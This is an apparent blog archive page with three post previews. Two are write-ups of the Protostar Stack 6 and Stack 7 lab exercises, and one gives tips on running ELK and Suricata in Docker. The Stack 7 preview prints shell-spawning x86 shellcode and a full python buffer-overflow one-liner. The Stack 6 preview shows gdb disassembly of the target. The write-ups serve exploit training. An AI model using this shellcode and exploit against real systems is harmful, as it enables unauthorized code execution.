Posts

Showing posts from November, 2016

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6  (gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :   mov    %ebp,%esp
0x08048507 :   pop    %ebp
0x08048508 :   ret  
End of assembler dump.  (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :…

Some experience when use Docker

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker.
Use docker-compose. It is very good deployment for production, build && run.
Install docker-compose via pip.
Use build image to create your custom start-up distro.
I used docker compose version 2 syntax, notice different with version, like network and net
Use network --net if you need monitor, or use all card
You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully.
Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started.
In docker command, must use command to hold tty, like: suricata -c xxx or python manager server 0.0.0.0:8080
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be conti…